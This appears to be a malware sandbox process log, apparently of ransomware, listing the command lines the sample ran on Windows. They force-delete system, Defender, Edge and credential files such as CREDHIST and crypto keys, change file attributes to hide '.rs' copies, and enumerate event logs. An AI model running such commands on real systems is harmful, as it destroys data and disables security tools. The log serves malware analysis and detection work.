C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\3638dbdf77ac8c270fc354e6beb43846\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\NTUSER.DAT{5da70f0b-eb4a-11eb-b8af-ceb2b35da2fd}.TMContainer00000000000000000001.regtrans-ms""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Links\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\Links\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2106.6-0\com.microsoft.defender.be.chrome.json""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\micaut.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Tools.Common.v9.0\9.0.0.0__b03f5f7f11d50a3a\Microsoft.Office.Tools.Common.v9.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\01a49b58e7b507b9b36a41c77b70e954\AuditPolicyGPManagedStubs.Interop.ni.dll.aux""3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe el4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini.rs""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini.rs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico""3⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files\Common Files\microsoft shared\VGX\VGX.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VGX\VGX.dll.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\wab32res.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Crypto\SystemKeys\e20a5d00f699f8b0d3cc797944b4c0cf_ff33445f-a36e-4a95-8e5f-bca99faf3ebd""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\All Users\Microsoft\Crypto\SystemKeys\e20a5d00f699f8b0d3cc797944b4c0cf_ff33445f-a36e-4a95-8e5f-bca99faf3ebd"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Downloads\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\Downloads\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\Admin\Downloads\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\InkDiv.dll""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\InkDiv.dll"4⤵
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\User Account Pictures\defaultuser0.dat""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Network\Downloader\edb.log""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\9ced09ff6ea374cad69fc0f1c9813382\Microsoft.PowerShell.Editor.ni.dll""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Desktop\desktop.ini.rs"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\a0efb4309fa0f9874cac236effbb8dc4\Microsoft.PowerShell.Diagnostics.Activities.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-localization-l1-2-0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\84da3b83d2e6048c428544b929af8250\Microsoft.Windows.Diagnosis.TroubleshootingPack.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Internet Explorer\en-US\hmmapi.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\f6c29964c30f44eef1ff495ad9c07439\Microsoft.PowerShell.GPowerShell.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\b4142a8a2a6b27ee0883d89429c9417e\Microsoft.PowerShell.ScheduledJob.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\af-ZA\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Tools.v9.0\9.0.0.0__b03f5f7f11d50a3a\Microsoft.Office.Tools.v9.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\810e836b664c62065a7bf8b03716f8ff\Microsoft.Windows.Diagnosis.Commands.UpdateDiagRootcause.ni.dll""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\945c6be7dbbadeeaf168e04a2bd532e8\Microsoft.Dtc.PowerShell.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Tools.Word.v9.0\9.0.0.0__b03f5f7f11d50a3a\Microsoft.Office.Tools.Word.v9.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\adodb.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-20210722-170812.log""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\30baa7f1ac8eebaf4738bba2dc47d19f\Microsoft.Windows.Diagnosis.Commands.WriteDiagProgress.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\ClickToRun\ProductReleases\EA92A936-8165-4F03-AFAE-D997D3F16044\en-us.16\MasterDescriptor.en-us.xml""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\as-IN\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Diagnosis\AggregatorStorage\UpdatePolicyScenarioReliabilityAggregator$""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\755e1e1fca5fbce03da7e8623105a3b1\Microsoft.Windows.Diagnosis.Commands.GetDiagInput.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\e338a7229f48b50c0b887709d449005d\Microsoft.PowerShell.Activities.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Microsoft\EdgeCore\92.0.902.62\92.0.902.62.manifest""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\AirSpace.Etw.man""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\92.0.902.62.manifest""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\DeploymentConfiguration.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\InkObj.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\a3dac3c7d2e408eea4549415260515f0\Microsoft.PowerShell.Core.Activities.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOMessageProvider.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C99be4d25#\97605d8f331365dca8419768231e1959\Microsoft.ConfigCI.Commands.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_pref.ico""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Crypto\SystemKeys\e20a5d00f699f8b0d3cc797944b4c0cf_ff33445f-a36e-4a95-8e5f-bca99faf3ebd""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Tools.Outlook.v9.0\9.0.0.0__b03f5f7f11d50a3a\Microsoft.Office.Tools.Outlook.v9.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\5d6d5b5d546ae1095913a04bc8e66010\Microsoft.GroupPolicy.Interop.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\1e7007bb925405b745cc0c9664e56d23\Microsoft.ApplicationId.RuleWizard.ni.dll.aux""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1000\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\0b19a4cfbb94982e1a4db40e81566196\Microsoft.PowerShell.Diagnostics.Activities.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Internet Explorer\ExtExport.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\3aff77d8bef09e57b94ccb6a80866819\Microsoft.Isam.Esent.Interop.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\edb.jcp""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bopomofo.nlp""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\DiagnosticLogCSP\Collectors\DiagnosticLogCSP_Collector_Autopilot_2021_7_22_3_11_17.etl""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\DiagnosticLogCSP\Collectors\DiagnosticLogCSP_Collector_Autopilot_2021_7_22_3_11_17.etl""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\All Users\Microsoft\DiagnosticLogCSP\Collectors\DiagnosticLogCSP_Collector_Autopilot_2021_7_22_3_11_17.etl"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\19ff937c54753aacc753dc50e622e8e2\CustomMarshalers.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.resources.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\az-Latn-AZ\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.147.37\EdgeUpdate.dat""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\a11c9dca6fd8b19c3fd49508e105c6a1\Microsoft.PowerShell.Security.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Network\Downloader\edb.chk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Network\Downloader\edb.chk""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\All Users\Microsoft\Network\Downloader\edb.chk"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\bg-BG\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\bn-IN\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\CREDHIST""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\CREDHIST""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\CREDHIST"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\131645e1eec24dbdeee9d322d4fe701e\Microsoft.InternationalSettings.Commands.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\edb.jcp""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\edb.jcp"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\8db8d076664a501529efa53676fffe19\Microsoft.ApplicationId.Framework.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\ab152a3cf67c37ea0803476cd27b387c\Microsoft.Management.Infrastructure.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\System\wab32.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\wab32.dll.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini.rs""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini.rs"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Windows\assembly\PublisherPolicy.tme.rs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Windows Terminal.lnk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\InkDiv.dll.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\aa4d97bb095855b26f5efb45a4ecf944\Microsoft.WSMan.Runtime.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\10a8e1e9dcd705dd0a04dce845795a93\Microsoft.Isam.Esent.Interop.Wsa.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b07944c8660c1ae1c12b65abb5b81559\Microsoft.Dtc.PowerShell.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\ar-SA\mpuxagent.dll.mui""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Service\Unknown.Log""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.Resources.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll""3⤵
-
